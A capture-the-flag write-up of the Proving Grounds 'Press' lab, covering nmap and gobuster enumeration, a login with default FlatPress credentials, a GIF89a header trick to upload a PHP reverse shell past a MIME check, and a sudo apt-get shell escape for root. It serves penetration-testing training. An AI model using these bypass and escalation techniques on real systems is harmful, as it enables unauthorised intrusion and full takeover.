In this walk through, we will be going through the Press room from Proving Grounds. This room is rated as Intermediate on the platform and it consist of exploitation of FlatPress CMS using File Upload attacks to get the initial foothold. For the privilege escalation, exploitation of the sudo misconfiguration for the apt-get binary is required to get root. So, let’s get started without any delay.
Table of Contents
Machine Info:
Title | Press |
IPaddress | 192.168.169.29 |
Difficulty | Intermediate |
OS | Linux |
Description | Press is an Intermediate Linux machine that is running FlatPress CMS on it which can be exploited using File Upload attacks to get the initial foothold. For the privilege escalation, exploitation of the sudo misconfiguration for the apt-get binary is required. |
Enumeration:
- I started off with a regular aggressive nmap scan and found only 3 ports opened – 22 (SSH), 80 (SSH) and 8089 (HTTP).
$ sudo nmap -A 192.168.169.29 [sudo] password for wh1terose: Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-06 21:20 IST Nmap scan report for 192.168.169.29 Host is up (0.21s latency). Not shown: 996 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) | vulners: | cpe:/a:openbsd:openssh:8.4p1: | PRION:CVE-2016-20012 5.0 https://vulners.com/prion/PRION:CVE-2016-20012 | PRION:CVE-2021-28041 4.6 https://vulners.com/prion/PRION:CVE-2021-28041 | CVE-2021-28041 4.6 https://vulners.com/cve/CVE-2021-28041 | PRION:CVE-2021-41617 4.4 https://vulners.com/prion/PRION:CVE-2021-41617 | CVE-2021-41617 4.4 https://vulners.com/cve/CVE-2021-41617 | PRION:CVE-2020-14145 4.3 https://vulners.com/prion/PRION:CVE-2020-14145 | CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145 | CVE-2016-20012 4.3 https://vulners.com/cve/CVE-2016-20012 | PRION:CVE-2021-36368 2.6 https://vulners.com/prion/PRION:CVE-2021-36368 |_ CVE-2021-36368 2.6 https://vulners.com/cve/CVE-2021-36368 53/tcp filtered domain 80/tcp open http Apache httpd 2.4.56 ((Debian)) |_http-server-header: Apache/2.4.56 (Debian) |_http-title: Lugx Gaming Shop HTML5 Template | vulners: | cpe:/a:apache:http_server:2.4.56: | OSV:BIT-2023-31122 6.4 https://vulners.com/osv/OSV:BIT-2023-31122 | OSV:BIT-APACHE-2023-45802 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2023-45802 | OSV:BIT-APACHE-2023-43622 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2023-43622 | OSV:BIT-APACHE-2023-31122 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2023-31122 | OSV:BIT-2023-45802 5.0 https://vulners.com/osv/OSV:BIT-2023-45802 | OSV:BIT-2023-43622 5.0 https://vulners.com/osv/OSV:BIT-2023-43622 | F7F6E599-CEF4-5E03-8E10-FE18C4101E38 5.0 https://vulners.com/githubexploit/F7F6E599-CEF4-5E03-8E10-FE18C4101E38 *EXPLOIT* | E5C174E5-D6E8-56E0-8403-D287DE52EB3F 5.0 https://vulners.com/githubexploit/E5C174E5-D6E8-56E0-8403-D287DE52EB3F *EXPLOIT* | DB6E1BBD-08B1-574D-A351-7D6BB9898A4A 5.0 https://vulners.com/githubexploit/DB6E1BBD-08B1-574D-A351-7D6BB9898A4A *EXPLOIT* | CVE-2023-43622 5.0 https://vulners.com/cve/CVE-2023-43622 | CVE-2023-31122 5.0 https://vulners.com/cve/CVE-2023-31122 | CNVD-2023-93320 5.0 https://vulners.com/cnvd/CNVD-2023-93320 | C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B 5.0 https://vulners.com/githubexploit/C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B *EXPLOIT* | BD3652A9-D066-57BA-9943-4E34970463B9 5.0 https://vulners.com/githubexploit/BD3652A9-D066-57BA-9943-4E34970463B9 *EXPLOIT* | B0208442-6E17-5772-B12D-B5BE30FA5540 5.0 https://vulners.com/githubexploit/B0208442-6E17-5772-B12D-B5BE30FA5540 *EXPLOIT* | A820A056-9F91-5059-B0BC-8D92C7A31A52 5.0 https://vulners.com/githubexploit/A820A056-9F91-5059-B0BC-8D92C7A31A52 *EXPLOIT* | 9814661A-35A4-5DB7-BB25-A1040F365C81 5.0 https://vulners.com/githubexploit/9814661A-35A4-5DB7-BB25-A1040F365C81 *EXPLOIT* | 5A864BCC-B490-5532-83AB-2E4109BB3C31 5.0 https://vulners.com/githubexploit/5A864BCC-B490-5532-83AB-2E4109BB3C31 *EXPLOIT* | 17C6AD2A-8469-56C8-BBBE-1764D0DF1680 5.0 https://vulners.com/githubexploit/17C6AD2A-8469-56C8-BBBE-1764D0DF1680 *EXPLOIT* |_ CVE-2023-45802 2.6 https://vulners.com/cve/CVE-2023-45802 8089/tcp open http Apache httpd 2.4.56 ((Debian)) |_http-generator: FlatPress fp-1.2.1 |_http-server-header: Apache/2.4.56 (Debian) |_http-title: FlatPress | vulners: | cpe:/a:apache:http_server:2.4.56: | OSV:BIT-2023-31122 6.4 https://vulners.com/osv/OSV:BIT-2023-31122 | OSV:BIT-APACHE-2023-45802 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2023-45802 | OSV:BIT-APACHE-2023-43622 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2023-43622 | OSV:BIT-APACHE-2023-31122 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2023-31122 | OSV:BIT-2023-45802 5.0 https://vulners.com/osv/OSV:BIT-2023-45802 | OSV:BIT-2023-43622 5.0 https://vulners.com/osv/OSV:BIT-2023-43622 | F7F6E599-CEF4-5E03-8E10-FE18C4101E38 5.0 https://vulners.com/githubexploit/F7F6E599-CEF4-5E03-8E10-FE18C4101E38 *EXPLOIT* | E5C174E5-D6E8-56E0-8403-D287DE52EB3F 5.0 https://vulners.com/githubexploit/E5C174E5-D6E8-56E0-8403-D287DE52EB3F *EXPLOIT* | DB6E1BBD-08B1-574D-A351-7D6BB9898A4A 5.0 https://vulners.com/githubexploit/DB6E1BBD-08B1-574D-A351-7D6BB9898A4A *EXPLOIT* | CVE-2023-43622 5.0 https://vulners.com/cve/CVE-2023-43622 | CVE-2023-31122 5.0 https://vulners.com/cve/CVE-2023-31122 | CNVD-2023-93320 5.0 https://vulners.com/cnvd/CNVD-2023-93320 | C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B 5.0 https://vulners.com/githubexploit/C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B *EXPLOIT* | BD3652A9-D066-57BA-9943-4E34970463B9 5.0 https://vulners.com/githubexploit/BD3652A9-D066-57BA-9943-4E34970463B9 *EXPLOIT* | B0208442-6E17-5772-B12D-B5BE30FA5540 5.0 https://vulners.com/githubexploit/B0208442-6E17-5772-B12D-B5BE30FA5540 *EXPLOIT* | A820A056-9F91-5059-B0BC-8D92C7A31A52 5.0 https://vulners.com/githubexploit/A820A056-9F91-5059-B0BC-8D92C7A31A52 *EXPLOIT* | 9814661A-35A4-5DB7-BB25-A1040F365C81 5.0 https://vulners.com/githubexploit/9814661A-35A4-5DB7-BB25-A1040F365C81 *EXPLOIT* | 5A864BCC-B490-5532-83AB-2E4109BB3C31 5.0 https://vulners.com/githubexploit/5A864BCC-B490-5532-83AB-2E4109BB3C31 *EXPLOIT* | 17C6AD2A-8469-56C8-BBBE-1764D0DF1680 5.0 https://vulners.com/githubexploit/17C6AD2A-8469-56C8-BBBE-1764D0DF1680 *EXPLOIT* |_ CVE-2023-45802 2.6 https://vulners.com/cve/CVE-2023-45802 No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.80%E=4%D=2/6%OT=22%CT=1%CU=37943%PV=Y%DS=4%DC=T%G=Y%TM=65C2556B OS:%P=x86_64-pc-linux-gnu)SEQ(SP=FD%GCD=1%ISR=109%TI=Z%II=I%TS=A)SEQ(SP=FD% OS:GCD=1%ISR=109%TI=Z%TS=A)OPS(O1=M54EST11NW7%O2=M54EST11NW7%O3=M54ENNT11NW OS:7%O4=M54EST11NW7%O5=M54EST11NW7%O6=M54EST11)WIN(W1=FE88%W2=FE88%W3=FE88% OS:W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M54ENNSNW7%CC=Y%Q=)T1 OS:(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T= OS:40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%U OS:N=0%RIPL=G%RID=G%RIPCK=G%RUCK=B10C%RUD=G)IE(R=Y%DFI=N%T=40%CD=S) Network Distance: 4 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 1025/tcp) HOP RTT ADDRESS 1 217.57 ms 192.168.45.1 2 213.49 ms 192.168.45.254 3 217.61 ms 192.168.251.1 4 217.86 ms 192.168.169.29 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 61.44 seconds
- Enumerated the web server on port 80 and found a static website related to Gaming. Looked around the different pages on the website but found nothing interesting.
- Fired gobuster on the target web server to reveal some hidden directories. Found nothing useful here as well.
$ gobuster dir -u http://192.168.169.29/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt -x html =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://192.168.169.29/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /home/wh1terose/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Extensions: html [+] Timeout: 10s =============================================================== 2024/02/06 21:25:51 Starting gobuster in directory enumeration mode =============================================================== /contact.html (Status: 200) [Size: 6903] /assets (Status: 301) [Size: 317] [--> http://192.168.169.29/assets/] /shop.html (Status: 200) [Size: 11662] /index.html (Status: 200) [Size: 15103] /vendor (Status: 301) [Size: 317] [--> http://192.168.169.29/vendor/] /server-status (Status: 403) [Size: 279] /product-details.html (Status: 200) [Size: 9655] =============================================================== 2024/02/06 21:39:53 Finished ===============================================================
- Next, enumerated the web server on port 8089 and found the FlatPress CMS running.
- Found a login panel on the right sidebar. Used the default login username and password combo and got into the backend of the CMS.
admin: password
Initial Access:
- Once i landed in the Administration area. The Uploader functionality caught my attention. Next, i tried to upload a normal text file on the target and was able to upload and execute it through it. Nice!
- But when i tried to upload a PHP reverse shell using it. It throws an error on my face like below.
- The application Uploader functionality was checking the MIME type information of the uploading file and was discarding those which have PHP set to it. We can easily bypass this by adding the below magic header to it. Now, when our payload file is processed, it will be marked as image/gif instead of PHP due to introduced header.
GIF89a;
- Using the above technique, i was able to successfully bypass the filtering and then executed the payload to get a reverse connection back.
Privilege Escalation:
- Executed LinPEAS on the target to enumerate some potential privilege escalation attack vectors and found out that we can run the apt-get binary as root without any password.
- Next, used the GTFObins exploit for the concerned binary to get root on the target and captured the root flag to mark the machine as complete.
sudo apt-get changelog apt !/bin/sh
Also Read: PG – Pelican
Conclusion:
So that was “Press” for you. We started off with a regular nmap scan and found 3 ports opened – 22 (SSH), 80 (SSH) and 8089 (HTTP). Enumerated the web server on port 8089 and found the FlatPress CMS running. Found a login panel on the right sidebar. Used the default login username and password combo and got into the backend of the CMS. Once i landed in the Administration area. Uploaded my reverse shell payload and bypassed the filter to get initial foothold on the target. For the privilege escalation, exploitation of the sudo misconfiguration for the apt-get binary was done to get root. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.